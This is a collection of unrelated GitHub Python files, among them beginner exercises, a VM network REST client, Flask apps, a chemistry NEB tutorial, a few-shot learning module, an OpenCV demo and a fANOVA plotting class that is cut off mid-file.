+{"seq_id":"15596808065","text":"# EXERCSIE 4 :\r\n# write a function that takes a string and return it in the reverse order.\r\n\r\n\r\ndef reverse_string(chars: str):\r\n \"\"\"Takes a string and return it in the reverse order.\"\"\"\r\n return chars[::-1]\r\n\r\n\r\nmy_str = input(\"Enter something : \")\r\n\r\noutput = reverse_string(my_str)\r\nprint(f\"Your reversed string is {output}.\")\r\n","repo_name":"UtkarshYadav360/CheckIO-Python-Practice","sub_path":"Strings and Integers/exercise 4.py","file_name":"exercise 4.py","file_ext":"py","file_size_in_byte":337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"9975321382","text":"\nimport logging\nimport requests as rq\n\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\nrq.packages.urllib3.disable_warnings(InsecureRequestWarning)\n\nfrom rest.client.rest_client_base import RestClientBase\n\nlog = logging.getLogger(__name__)\n\n\nclass NetworkApi(RestClientBase):\n\n def _make_vm_network(self, network):\n\n res = {'id' : network['id'],\n 'name': network['name'],\n 'vlan': network['vlan'],\n 'connect_mode': network['connectMode'],\n 'vlan_flag': network['vlanFlag'],\n 'mtu': network['mtu']}\n\n res['customer_vlan'] = network['userVlan']\n res['tpid'] = network['tpidType']\n\n return res\n\n def _make_vm_networks(self, networks):\n return [self._make_vm_network(network) for network in networks]\n\n def get_vm_networks(self):\n headers = self._customize_header()\n if headers:\n r = rq.get(\"https://{center_ip}/hosts/{hostId}/networks?type=vmnetwork\".\n format(center_ip=self.center_ip, hostId=self._convert_node_ip_to_id()),\n headers=headers, verify=False)\n if r.status_code == rq.codes.ok:\n return self._make_vm_networks(r.json())\n else:\n log.error(\"Some errors occurred while querying vm network, the error messages is %s\" % r.text)\n return None\n else:\n return None\n","repo_name":"JackSunshine/frank_individual_repo","sub_path":"sharp/rest/client/network_api.py","file_name":"network_api.py","file_ext":"py","file_size_in_byte":1458,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"74293348144","text":"from flask import Flask, render_template\nfrom rdf_utils.obeu_graph import OBEUGraph\n\napp = Flask(__name__)\napp.debug = True\n\n\n@app.route('//')\ndef index(city, year):\n \"\"\"\n Shows visualizations of a *city* in a particular *year*, given that the\n corresponding dataset is loaded inside the SPARQL server\n :param city: name of the city as it appears in the dataset\n :param year: corresponding year to be used as filter\n :return: render_template() answer\n \"\"\"\n g = OBEUGraph()\n # g.add_obeu_dimension_edges(\n # city=city,\n # year=year,\n # query_file='/home/piero/Documents/fraunhofer/obeu-explorer/rdf_utils/queries/'\n # 'exploring.rq')\n g.add_obeu_observation_edges(\n city=city,\n year=year,\n query_file='/home/piero/Documents/fraunhofer/obeu-explorer/rdf_utils/'\n 'queries/all-about-observations-from-city-in-a-year.rq')\n data = {'nodes': [], 'edges': []}\n\n # add node data as needed by visjs to help us show some useful graphics\n for node_id in g.node:\n data['nodes'].append({\n 'id': node_id,\n 'label': g.node[node_id]['label'],\n 'title': 'Name: {} Amount (€): {}'\n .format(g.node[node_id]['label'], g.node[node_id]['amount']),\n 'group': g.node[node_id]['group']\n })\n\n # add special format for edges used by visjs\n # exm: [{from: 1, to: 10}, {from: 2, to: 12]\n for edge in g.edges():\n data['edges'].append({'from': edge[0], 'to': edge[1]})\n\n return render_template('layouts/city_year_graph.html', data=data)\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=5000)\n","repo_name":"openbudgets/microsite_rdf","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"22785924526","text":"# 날짜 : 1월 3일_01\n# 작성자 : 윤찬우\n# 프로그램 : 함수1\n\n'''\n====함수 정의====\ndef 함수명():\n 진행문장\n \n====함수 호출====\n함수명()\n\n# ex1) 학과와 이름 정보를 출력하는 함수\ndef info():\n print(\"컴퓨터공학\")\n print(\"윤찬우\")\n\ninfo()\n\n=====값을 반환하는 함수 형식=====\ndef 함수명(매개변수):\n return 결과값\n \n1) print(함수명(인수))\n2) 변수명 = 함수명(인수)\n print(변수명)\n===========================\n\n=====값을 출력하는 함수 형���=====\ndef 함수명(매개변수):\n 실행문장\n함수이름(인수)\n===========================\n\n# ex2) 5의 제곱을 출력하는 함수\ndef sq(num):\n print(num * num)\nsq(5)\n\n# ex3) 5의 제곱을 반환하는 함수\ndef sq(num):\n return num * num\nprint(sq(5))\n\n# ex4) 입력한 정수의 제곱을 출력하는 함수\ndef sq(num):\n print(num * num)\nsq(int(input(\"정수 입력 : \")))\n\n# ex5) 입력한 정수의 제곱을 반환하는 함수\ndef sq(num):\n return num * num\nsq(int(input(\"정수 입력 : \")))\n\n# ex6) 두 정수의 합을 출력하는 함수\ndef twosum(x1, x2):\n print(x1 + x2)\n\n# ex7) 정수 하나를 입력받아 1부터 입력한 정수까지의 합을 반환하는 함수\ndef retint():\n sum = 0\n ll = int(input(\"정수 입력 : \"))\n for i in range(1, ll+1):\n sum += i\n return sum\nprint(retint())\n\n# ex8) 이름과 나이를 입력 받아 출력하는 함수\ndef information():\n name = input(\"이름 : \")\n age = input(\"나이 : \")\n print(\"이름은 %s이고 나이는 %s입니다.\" %(name, age))\ninformation()\n\n# ex8) 반지름을 입력 받아 원을 그리는 함수 작성\n# (-200, 0), (0, 0), (200, 0)위치에 원을 그리는 함수\nimport turtle as t\n\nt.color(\"red\")\n\ndef radius(r):\n t.up()\n t.goto(-200, 0)\n t.down()\n t.circle(r)\n t.up()\n t.goto(200, 0)\n t.down()\n t.circle(r)\n t.up()\n t.goto(0, 0)\n t.down()\n t.circle(r)\n\nlength = int(t.textinput(\"\",\"반지름 입력 : \"))\nradius(length)\n'''\n#=================================여기서부터는 실습 예제\n# ex10) 실수 두개를 입력 받아 합을 반환하는 함수\ndef twosum(a, b):\n return a + b\nprint(twosum(float(input(\"정수 입력1 : \")), float(input(\"정수 입력1 : \"))))\n\n\n# ex11) 단을 입력 받아 해당 구구단을 출력하는 함수\ndef multi(n):\n for i in range(1, 10):\n print(\"%d X %d = %d\" %(n, i, n * i))\nmulti(int(input(\"단 입력 : \")))\n\n# ex12) 변의 길이의 입력 받아 별을 그리는 함수\n# (0, 200), (0, -200) 위치에 별을 그린다.\nimport turtle as t\n\nt.color(\"red\")\ndef star(l):\n t.up()\n t.goto(-200, 0)\n t.down()\n for i in range(5):\n t.fd(l)\n t.lt(144)\n t.up()\n t.goto(200, 0)\n t.down()\n for i in range(5):\n t.fd(l)\n t.lt(144)\nstar(int(t.textinput(\"\",\"길이 입력 : \")))\n\n# ex13) 세 정수의 곱을 출력하는 함수\ndef mux(x1, x2, x3):\n print(x1 * x2 * x3)\nmux(1, 2, 3)\n","repo_name":"ycw1879/Vacation-Python-","sub_path":"Day07/Jan_03_01.py","file_name":"Jan_03_01.py","file_ext":"py","file_size_in_byte":3054,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"39610354759","text":"from ase.calculators.emt import EMT\nfrom ase.io import read\nfrom ase.neb import NEB\nfrom ase.optimize import BFGS, MDMin\nimport matplotlib.pyplot as plt\nfrom catlearn.optimize.mlneb import MLNEB\nfrom ase.neb import NEBTools\nimport copy\nfrom catlearn.optimize.tools import plotneb\n\n\n\"\"\" \n Toy model rearrangement of Pt heptamer island on Pt(111).\n This example contains: \n 1. Optimization of the initial and final end-points of the reaction path. \n 2.A. NEB optimization using CI-NEB as implemented in ASE. \n 2.B. NEB optimization using our machine-learning surrogate model.\n 3. Comparison between the ASE NEB and our ML-NEB algorithm.\n\"\"\"\n\n# 1. Structural relaxation. ##################################################\n\n# Setup calculator:\nase_calculator = EMT()\n\n# 1.1. Structures:\n\nslab_initial = read('./initial.traj')\nslab_initial.set_calculator(copy.deepcopy(ase_calculator))\n\nslab_final = read('./final.traj')\nslab_final.set_calculator(ase_calculator)\n\n# 1.2. Optimize initial and final end-points.\n\n# Initial end-point:\nqn = BFGS(slab_initial, trajectory='initial.traj')\nqn.run(fmax=0.01)\n\n# Final end-point:\nqn = BFGS(slab_final, trajectory='final.traj')\nqn.run(fmax=0.01)\n\n# Set number of images\nn_images = 11\n\n# 2.A. NEB using ASE\n\ninitial_ase = read('initial.traj')\nfinal_ase = read('final.traj')\n\nase_calculator = copy.deepcopy(ase_calculator)\n\nimages_ase = [initial_ase]\nfor i in range(1, n_images-1):\n image = initial_ase.copy()\n image.set_calculator(copy.deepcopy(ase_calculator))\n images_ase.append(image)\n\nimages_ase.append(final_ase)\n\nneb_ase = NEB(images_ase, climb=True)\nneb_ase.interpolate(method='idpp')\n\nqn_ase = MDMin(neb_ase, trajectory='neb_ase.traj')\nqn_ase.run(fmax=0.05)\n\n# 2.B. NEB using CatLearn\n\nneb_catlearn = MLNEB(start='initial.traj', end='final.traj',\n ase_calc=copy.deepcopy(ase_calculator),\n n_images=n_images,\n interpolation='idpp', restart=False)\n\nneb_catlearn.run(fmax=0.05, trajectory='ML-NEB.traj')\n\n# 3. Summary of the results\n\n# NEB ASE:\nprint('\\nSummary of the results: \\n')\n\natoms_ase = read('neb_ase.traj', ':')\nn_eval_ase = len(atoms_ase) - 2 * (len(atoms_ase)/n_images)\n\nprint('Number of function evaluations CI-NEB implemented in ASE:', n_eval_ase)\n\n# ML-NEB:\natoms_catlearn = read('evaluated_structures.traj', ':')\nn_eval_catlearn = len(atoms_catlearn) - 2\nprint('Number of function evaluations CatLearn:', n_eval_catlearn)\n\n# Comparison:\nprint('\\nThe ML-NEB algorithm required ',\n (n_eval_ase/n_eval_catlearn),\n 'times less number of function evaluations than '\n 'the standard NEB algorithm.')\n\n# Plot ASE NEB:\nnebtools_ase = NEBTools(images_ase)\n\nSf_ase = nebtools_ase.get_fit()[2]\nEf_ase = nebtools_ase.get_fit()[3]\n\nEf_neb_ase, dE_neb_ase = nebtools_ase.get_barrier(fit=False)\nnebtools_ase.plot_band()\n\nplt.show()\n\n# Plot ML-NEB predicted path and show images along the path:\nplotneb(trajectory='ML-NEB.traj', view_path=False)\n\n","repo_name":"SUNCAT-Center/CatLearn","sub_path":"tutorials/11_NEB/03_Heptamer_Island/neb_heptamer_island.py","file_name":"neb_heptamer_island.py","file_ext":"py","file_size_in_byte":2987,"program_lang":"python","lang":"en","doc_type":"code","stars":94,"dataset":"github-code","pt":"91"}
+{"seq_id":"10052605088","text":"from Stack import *\n\ndef sort_stack(stack1):\n stack2 = Stack()\n while (stack1.isEmpty() == False):\n tmp = stack1.pop()\n count = 0\n while (stack2.isEmpty() == False):\n if (stack2.peek() > tmp):\n stack1.push(stack2.pop())\n count += 1\n else:\n stack2.push(tmp)\n break\n if stack2.isEmpty() == True:\n stack2.push(tmp)\n while (count > 0):\n stack2.push(stack1.pop())\n count -= 1\n return stack2\n\na = Stack()\na.push(8)\na.push(5)\na.push(4)\na.push(10)\na.push(7)\n\nb = sort_stack(a)\nb.printNode()\n","repo_name":"dlydb/Cracking_Interview","sub_path":"3_5.py","file_name":"3_5.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"7894673549","text":"import unittest\r\n\r\nfrom easy_config.Configer import Configer\r\nfrom easy_config.IO_Converter import IO_Converter\r\n\r\nimport argparse \r\n\r\nclass IO_ConverterTestCase(unittest.TestCase):\r\n\r\n def setUp(self):\r\n self.cfger = Configer()\r\n self.cfger.cfg_from_ini(\"./test_cfg_a.ini\")\r\n self.cfger.cfg_from_str(self._build_cfg_text())\r\n\r\n def _build_cfg_text(self):\r\n return '''\r\n # Initial config file :\r\n [Section_test_A] \r\n mrg_var_tst = fromBcfg@str\r\n\r\n [Section_test_B]\r\n fflg = False@bool # test inline comment in cfg-str\r\n tflg = True@bool\r\n # Cell cfg written by Josef-Huang..\r\n '''\r\n \r\n def test_io_convter(self):\r\n cfg_cnvter = IO_Converter()\r\n \r\n argp_cfg = cfg_cnvter.cnvt_cfg(self.cfger, 'argparse')\r\n ome_cfg = cfg_cnvter.cnvt_cfg(self.cfger, 'omegacfg')\r\n yaml_cfg = cfg_cnvter.cnvt_cfg(self.cfger, 'yaml')\r\n \r\n self.assertEqual(type(argp_cfg), argparse.Namespace)\r\n self.assertEqual(ome_cfg.Section_test_B.fflg, False)\r\n self.assertEqual(type(yaml_cfg), str)\r\n\r\nif __name__ == '__main__':\r\n tests = ['test_io_convter']\r\n suite = unittest.TestSuite(map(IO_ConverterTestCase, tests))\r\n unittest.main(verbosity=2)","repo_name":"HuangChiEn/easy_config","sub_path":"test/test_IO_Converter.py","file_name":"test_IO_Converter.py","file_ext":"py","file_size_in_byte":1294,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"}
+{"seq_id":"39141148817","text":"import math\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport numpy as np\n\nfrom pdb import set_trace as breakpoint\n\n\ndef L2SquareDist(A, B, average=True):\n # input A must be: [nB x Na x nC]\n # input B must be: [nB x Nb x nC]\n # output C will be: [nB x Na x Nb]\n assert(A.dim()==3)\n assert(B.dim()==3)\n assert(A.size(0)==B.size(0) and A.size(2)==B.size(2))\n nB = A.size(0)\n Na = A.size(1)\n Nb = B.size(1)\n nC = A.size(2)\n\n # AB = A * B = [nB x Na x nC] * [nB x nC x Nb] = [nB x Na x Nb]\n AB = torch.bmm(A, B.transpose(1,2))\n\n AA = (A * A).sum(dim=2,keepdim=True).view(nB, Na, 1) # [nB x Na x 1]\n BB = (B * B).sum(dim=2,keepdim=True).view(nB, 1, Nb) # [nB x 1 x Nb]\n # l2squaredist = A*A + B*B - 2 * A * B\n dist = AA.expand_as(AB) + BB.expand_as(AB) - 2 * AB\n if average:\n dist = dist / nC\n\n return dist\n\n\nclass PrototypicalNetwork(nn.Module):\n def __init__(self, opt):\n super(PrototypicalNetwork, self).__init__()\n scale_cls = opt['scale_cls'] if ('scale_cls' in opt) else 1.0\n self.scale_cls = nn.Parameter(\n torch.FloatTensor(1).fill_(scale_cls), requires_grad=True)\n\n def forward(self, features_test, features_train, labels_train):\n \"\"\"Recognize novel categories based on the Prototypical Nets approach.\n\n Classify the test examples (i.e., `features_test`) using the available\n training examples (i.e., `features_test` and `labels_train`) using the\n Prototypical Nets approach.\n\n Args:\n features_test: A 3D tensor with shape\n [batch_size x num_test_examples x num_channels] that represents\n the test features of each training episode in the batch.\n features_train: A 3D tensor with shape\n [batch_size x num_train_examples x num_channels] that represents\n the train features of each training episode in the batch.\n labels_train: A 3D tensor with shape\n [batch_size x num_train_examples x nKnovel] that represents\n the train labels (encoded as 1-hot vectors) of each training\n episode in the batch.\n\n Return:\n scores_cls: A 3D tensor with shape\n [batch_size x num_test_examples x nKnovel] that represents the\n classification scores of the test feature vectors for the\n nKnovel novel categories.\n \"\"\"\n assert(features_train.dim() == 3)\n assert(labels_train.dim() == 3)\n assert(features_test.dim() == 3)\n assert(features_train.size(0) == labels_train.size(0))\n assert(features_train.size(0) == features_test.size(0))\n assert(features_train.size(1) == labels_train.size(1))\n assert(features_train.size(2) == features_test.size(2))\n\n #************************* Compute Prototypes **************************\n labels_train_transposed = labels_train.transpose(1,2)\n # Batch matrix multiplication:\n # prototypes = labels_train_transposed * features_train ==>\n # [batch_size x nKnovel x num_channels] =\n # [batch_size x nKnovel x num_train_examples] * [batch_size * num_train_examples * num_channels]\n prototypes = torch.bmm(labels_train_transposed, features_train)\n # Divide with the number of examples per novel category.\n prototypes = prototypes.div(\n labels_train_transposed.sum(dim=2, keepdim=True).expand_as(prototypes)\n )\n #***********************************************************************\n scores_cls = -self.scale_cls * L2SquareDist(features_test, prototypes)\n return scores_cls\n\ndef create_model(opt):\n return PrototypicalNetwork(opt)\n","repo_name":"gidariss/FewShotWithoutForgetting","sub_path":"architectures/PrototypicalNetworksHead.py","file_name":"PrototypicalNetworksHead.py","file_ext":"py","file_size_in_byte":3774,"program_lang":"python","lang":"en","doc_type":"code","stars":513,"dataset":"github-code","pt":"91"}
+{"seq_id":"30138410064","text":"# 对Harris算法的改进,能够更好地检测角点\r\n\r\nimport cv2 as cv\r\nimport matplotlib.pyplot as plt\r\n\r\n# 1 读取图像\r\nimg = cv.imread('img/xl_5.jpg')\r\ngray = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\r\n# 2 角点检测\r\ncorners = cv.goodFeaturesToTrack(gray, 1000, 0.01, 10)\r\n# 3 绘制角点\r\nfor i in corners:\r\n x, y = i.ravel()\r\n cv.circle(img, (x, y), 2, (0, 0, 255), -1)\r\n# 4 图像展示\r\nplt.figure(figsize=(10, 8), dpi=100)\r\nplt.imshow(img[:, :, ::-1]), plt.title('shi-tomasi')\r\nplt.xticks([]), plt.yticks([])\r\nplt.show()\r\n","repo_name":"YEANG-i/Python-OpenCV","sub_path":"img_code/img_10_Shi_Tomasi.py","file_name":"img_10_Shi_Tomasi.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"}
+{"seq_id":"33362942654","text":"from flask import Flask, render_template\nfrom flask_googlemaps import GoogleMaps\nfrom flask_googlemaps import Map\nimport os\n\napp = Flask(__name__, template_folder=\"./templates\")\nGoogleMaps(app, key=\"AIzaSyATjzQ8WJokmp1wBcHyZhaA1fSEmdXARys\")\n\n\n\nUPLOAD_FOLDER = os.path.basename('uploads')\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\n\n@app.route('/')\ndef hello_world():\n return render_template('index.html')\n\n@app.route('/upload', methods=['POST'])\ndef upload_file():\n file = request.files['image']\n f = os.path.join(app.config['UPLOAD_FOLDER'], file.filename)\n \n # add your custom code to check that the uploaded file is a valid image and not a malicious file (out-of-scope for this post)\n file.save(f)\n\n return render_template('index.html')\n\n\n\n@app.route(\"/map\")\ndef mapview():\n # creating a map in the view\n\n sndmap = Map(\n identifier=\"sndmap\",\n lat=37.4419,\n lng=-122.1419,\n markers=[\n {\n 'icon': 'http://maps.google.com/mapfiles/ms/icons/green-dot.png',\n 'lat': 37.4419,\n 'lng': -122.1419,\n 'infobox': \"\"\n },\n {\n 'icon': 'http://maps.google.com/mapfiles/ms/icons/blue-dot.png',\n 'lat': 37.4300,\n 'lng': -122.1400,\n 'infobox': \"Hello World from other place\"\n }\n ]\n )\n return render_template('example.html', sndmap=sndmap)\n\nif __name__ == \"__main__\":\n app.run(debug=True)","repo_name":"dheerajsuvarna/Street-Wise","sub_path":"examples/example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":1563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"39723017333","text":"from ConfigSpace.hyperparameters import CategoricalHyperparameter, Constant\nimport os\nimport numpy as np\nimport warnings\nimport pickle\nimport re\nimport logging\n\nimport matplotlib.pyplot as plt\nimport itertools as it\nfrom matplotlib import cm\nfrom mpl_toolkits.mplot3d import Axes3D\n\nclass Visualizer(object):\n\n def __init__(self, fanova, cs, directory, y_label='Performance'):\n \"\"\"\n Parameters\n ------------\n fanova: fANOVA object\n\n cs : ConfigSpace instantiation\n\n directory: str\n Path to the directory in which all plots will be stored\n \"\"\"\n self.fanova = fanova\n self.cs = cs\n self.cs_params = cs.get_hyperparameters()\n assert os.path.exists(directory), \"directory %s doesn't exist\" % directory\n self.directory = directory\n self._y_label = y_label\n self.logger = logging.getLogger(self.__module__ + '.' + self.__class__.__name__)\n\n def create_all_plots(self, three_d=True, **kwargs):\n \"\"\"\n Creates plots for all main effects and stores them into a directory\n Specifically, all single and pairwise marginals are plotted\n\n Parameters\n ----------\n three_d: boolean\n whether or not to plot pairwise marginals in 3D-plot\n \"\"\"\n # single marginals\n for param_idx in range(len(self.cs_params)):\n param_name = self.cs_params[param_idx].name\n plt.close()\n outfile_name = os.path.join(self.directory, param_name.replace(os.sep, \"_\") + \".png\")\n self.logger.info(\"creating %s\" % outfile_name)\n\n self.plot_marginal(param, show=False, **kwargs)\n plt.savefig(outfile_name)\n\n # additional pairwise plots:\n dimensions = list(range(len(self.cs_params)))\n combis = list(it.combinations(dimensions, 2))\n for combi in combis:\n param_names = [self.cs_params[p].name for p in combi]\n plt.close()\n param_names = str(param_names)\n param_names = re.sub('[!,@#\\'\\n$\\[\\]]', '', param_names)\n outfile_name = os.path.join(self.directory, str(param_names).replace(\" \", \"_\") + \".png\")\n self.logger.info(\"creating %s\" % outfile_name)\n self.plot_pairwise_marginal(combi, three_d=three_d, **kwargs)\n plt.savefig(outfile_name)\n\n def generate_pairwise_marginal(self, param_indices, resolution=20):\n \"\"\"\n Creates a plot of pairwise marginal of a selected parameters\n\n Parameters\n ------------\n param_list: list of ints or strings\n Contains the selected parameters\n\n resolution: int\n Number of samples to generate from the parameter range as\n values to predict\n \"\"\"\n assert len(param_indices) == 2, \"You have to specify 2 (different) parameters\"\n grid_list, param_names = [], []\n if (isinstance(self.cs_params[param_indices[0]], (CategoricalHyperparameter)) or\n isinstance(self.cs_params[param_indices[1]], (CategoricalHyperparameter))):\n choice_arr = []\n param_names = []\n choice_vals = []\n for p in param_indices:\n if isinstance(self.cs_params[p], (CategoricalHyperparameter)):\n choice_arr.append(self.cs_params[p].choices)\n choice_vals.append(np.arange(len(self.cs_params[p].choices)))\n else:\n lower_bound = self.cs_params[p].lower\n upper_bound = self.cs_params[p].upper\n grid = np.linspace(lower_bound, upper_bound, resolution)\n choice_arr.append(grid)\n choice_vals.append(grid)\n\n param_names.append(self.cs_params[p].name)\n\n choice_arr = [[choice_arr[1], choice_arr[0]] if len(choice_arr[1]) > len(choice_arr[0]) else [choice_arr[0], choice_arr[1]]]\n choice_vals = [[choice_vals[1], choice_vals[0]] if len(choice_vals[1]) < len(choice_vals[0]) else [choice_vals[0], choice_vals[1]]]\n choice_arr = np.asarray(choice_arr).squeeze()\n choice_vals = np.asarray(choice_vals).squeeze()\n param_indices = [[param_indices[1], param_indices[0]] if len(choice_vals[1]) < len(choice_vals[0]) else [param_indices[0], param_indices[1]]]\n choice_arr = np.asarray(choice_arr).squeeze()\n choice_vals = np.asarray(choice_vals).squeeze()\n param_indices = np.asarray(param_indices).squeeze()\n zz = np.zeros((len(choice_vals[0]), len(choice_vals[1])))\n\n for i, x_value in enumerate(choice_vals[0]):\n for j, y_value in enumerate(choice_vals[1]):\n zz[i][j] = self.fanova.marginal_mean_variance_for_values(param_indices, [x_value, y_value])[0]\n\n return choice_arr, zz\n\n else:\n\n for p in param_indices:\n lower_bound = self.cs_params[p].lower\n upper_bound = self.cs_params[p].upper\n param_names.append(self.cs_params[p].name)\n grid = np.linspace(lower_bound, upper_bound, resolution)\n grid_list.append(grid)\n\n zz = np.zeros([resolution * resolution])\n for i, y_value in enumerate(grid_list[1]):\n for j, x_value in enumerate(grid_list[0]):\n zz[i * resolution + j] = self.fanova.marginal_mean_variance_for_values(param_indices, [x_value, y_value])[0]\n\n zz = np.reshape(zz, [resolution, resolution])\n\n return grid_list, zz\n\n def plot_pairwise_marginal(self, param_list, resolution=20, show=False, three_d=True, colormap=cm.jet,\n add_colorbar=True):\n \"\"\"\n Creates a plot of pairwise marginal of a selected parameters\n\n Parameters\n ------------\n param_list: list of ints or strings\n Contains the selected parameters\n\n resolution: int\n Number of samples to generate from the parameter range as\n values to predict\n\n show: boolean\n whether to call plt.show() to show plot directly as interactive matplotlib-plot\n\n three_d: boolean\n whether or not to plot pairwise marginals in 3D-plot\n\n colormap: matplotlib.Colormap\n which colormap to use for the 3D plots\n\n add_colorbar: bool\n whether to add the colorbar for 3d plots\n \"\"\"\n assert len(param_list) == 2, \"You have to specify 2 (different) parameters\"\n param_names, param_indices= [], []\n\n for p_idx in param_list:\n if type(p_idx) == str: # if param_list consists of parameter names\n p_idx = self.cs.get_idx_by_hyperparameter_name(p_idx)\n param_names.append(self.cs_params[p_idx].name)\n param_indices.append(p_idx)\n\n first_is_cat = isinstance(self.cs_params[param_indices[0]], CategoricalHyperparameter)\n second_is_cat = isinstance(self.cs_params[param_indices[1]], CategoricalHyperparameter)\n\n fig = plt.figure()\n plt.title('%s and %s' % (param_names[0], param_names[1]))\n\n if first_is_cat or second_is_cat:\n # At least one of the two parameters is categorical\n choices, zz = self.generate_pairwise_marginal(param_indices, resolution)\n if first_is_cat and second_is_cat:\n # Both parameters are categorical -> create hotmap\n plt.imshow(zz, cmap='hot', interpolation='nearest')\n plt.xticks(np.arange(0, len(choices[0])), choices[0], fontsize=8)\n plt.yticks(np.arange(0, len(choices[1])), choices[1], fontsize=8)\n plt.xlabel(param_names[0])\n plt.ylabel(param_names[1])\n plt.colorbar().set_label(self._y_label)\n else:\n # Only one of them is categorical -> create multi-line-plot\n cat_choices = self.cs_params[param_indices[0]].choices if first_is_cat else self.cs_params[param_indices[1]].choices\n\n for i, cat in enumerate(cat_choices):\n plt.plot(zz[i], label='%s' % str(cat))\n\n plt.ylabel(self._y_label)\n plt.xlabel(param_names[0] if second_is_cat else param_names[1]) # x-axis displays non-categorical\n plt.legend()\n plt.tight_layout()\n\n else:\n # No categoricals -> create 3D-plot\n grid_list, zz = self.generate_pairwise_marginal(param_indices, resolution)\n\n z_min, z_max = zz.min(), zz.max()\n display_xx, display_yy = np.meshgrid(grid_list[0], grid_list[1])\n\n if three_d:\n ax = Axes3D(fig)\n surface = ax.plot_surface(display_xx, display_yy, zz,\n rstride=1, cstride=1, cmap=colormap, linewidth=0, antialiased=False)\n ax.set_xlabel(param_names[0])\n ax.set_ylabel(param_names[1])\n ax.set_zlabel(self._y_label)\n if add_colorbar:\n fig.colorbar(surface, shrink=0.5, aspect=5)\n\n else:\n plt.pcolor(display_xx, display_yy, zz, cmap=colormap, vmin=z_min, vmax=z_max)\n plt.xlabel(param_names[0])\n\n if self.cs_params[param_indices[0]].log:\n plt.xscale('log')\n if self.cs_params[param_indices[1]].log:\n plt.yscale('log')\n\n plt.ylabel(param_names[1])\n plt.colorbar()\n\n if show:\n plt.show()\n else:\n interact_dir = os.path.join(self.directory, 'interactive_plots')\n if not os.path.exists(interact_dir):\n self.logger.info('creating %s' % interact_dir)\n os.makedirs(interact_dir)\n try:\n pickle.dump(fig, open(interact_dir + '/%s_%s.fig.pkl' % (param_names[0], param_names[1]), 'wb'))\n except AttributeError as err:\n self.logger.debug(err, exc_info=1)\n self.logger.info(\"Pickling the interactive pairwise-marginal plot (%s) raised an exception. Resume \"\n \"without pickling. \", str(param_names))\n\n return plt\n\n def generate_marginal(self, param, resolution=100):\n \"\"\"\n Creates marginals of a selected parameter for own plots\n\n Parameters\n ------------\n param: int or str\n Index of chosen parameter in the ConfigSpace (starts with 0)\n\n resolution: int\n Number of samples to generate from the parameter range as\n values to predict\n\n \"\"\"\n if type(param) == str:\n param = self.cs.get_idx_by_hyperparameter_name(param)\n if isinstance(self.cs_params[param], (CategoricalHyperparameter, Constant)):\n param_name = self.cs_params[param].name\n try:\n labels= self.cs_params[param].choices\n categorical_size = len(self.cs_params[param].choices)\n except AttributeError:\n labels = str(self.cs_params[param])\n categorical_size = 1\n marginals = [self.fanova.marginal_mean_variance_for_values([param], [i]) for i in range(categorical_size)]\n mean, v = list(zip(*marginals))\n std = np.sqrt(v)\n return mean, std\n\n else:\n lower_bound = self.cs_params[param].lower\n upper_bound = self.cs_params[param].upper\n log = self.cs_params[param].log\n if log:\n # JvR: my conjecture is that ConfigSpace uses the natural logarithm\n base = np.e\n log_lower = np.log(lower_bound) / np.log(base)\n log_upper = np.log(upper_bound) / np.log(base)\n grid = np.logspace(log_lower, log_upper, resolution, endpoint=True, base=base)\n '''\n if abs(grid[0] - lower_bound) > 0.00001:\n raise ValueError()\n if abs(grid[-1] - upper_bound) > 0.00001:\n raise ValueError()\n '''\n else:\n grid = np.linspace(lower_bound, upper_bound, resolution)\n mean = np.zeros(resolution)\n std = np.zeros(resolution)\n\n dim = [param]\n for i in range(0, resolution):\n (m, v) = self.fanova.marginal_mean_variance_for_values(dim, [grid[i]])\n mean[i] = m\n std[i] = np.sqrt(v)\n return mean, std, grid\n\n def plot_marginal(self, param, resolution=100, log_scale=None, show=True,\n incumbents=None):\n \"\"\"\n Creates a plot of marginal of a selected parameter\n\n Parameters\n ------------\n param: int or str\n Index of chosen parameter in the ConfigSpace (starts with 0)\n\n resolution: int\n Number of samples to generate from the parameter range as\n values to predict\n\n log_scale: boolean\n If log scale is required or not. If no value is given, it is\n deduced from the ConfigSpace provided\n\n show: boolean\n whether to call plt.show() to show plot directly as interactive matplotlib-plot\n\n incumbents: List[Configuration]\n list of ConfigSpace.Configurations that are marked as incumbents\n \"\"\"\n param_idx = param\n if type(param_idx) == str:\n param_idx = self.cs.get_idx_by_hyperparameter_name(param_idx)\n param_name = self.cs_params[param_idx].name\n\n # check if categorical\n if isinstance(self.cs_params[param_idx], (CategoricalHyperparameter, Constant)):\n # PREPROCESS\n try:\n labels = self.cs_params[param_idx].choices\n categorical_size = len(self.cs_params[param_idx].choices)\n except AttributeError:\n labels = str(self.cs_params[param_idx])\n categorical_size = 1\n indices = np.arange(1, categorical_size+1, 1)\n mean, std = self.generate_marginal(param_idx)\n min_y = mean[0]\n max_y = mean[0]\n\n # PLOT\n b = plt.boxplot([[x] for x in mean])\n plt.xticks(indices, labels)\n # blow up boxes\n for box, std_ in zip(b[\"boxes\"], std):\n y = box.get_ydata()\n y[2:4] = y[2:4] + std_\n y[0:2] = y[0:2] - std_\n y[4] = y[4] - std_\n box.set_ydata(y)\n min_y = min(min_y, y[0] - std_)\n max_y = max(max_y, y[2] + std_)\n\n plt.ylim([min_y, max_y])\n\n plt.ylabel(self._y_label)\n plt.xlabel(param_name)\n 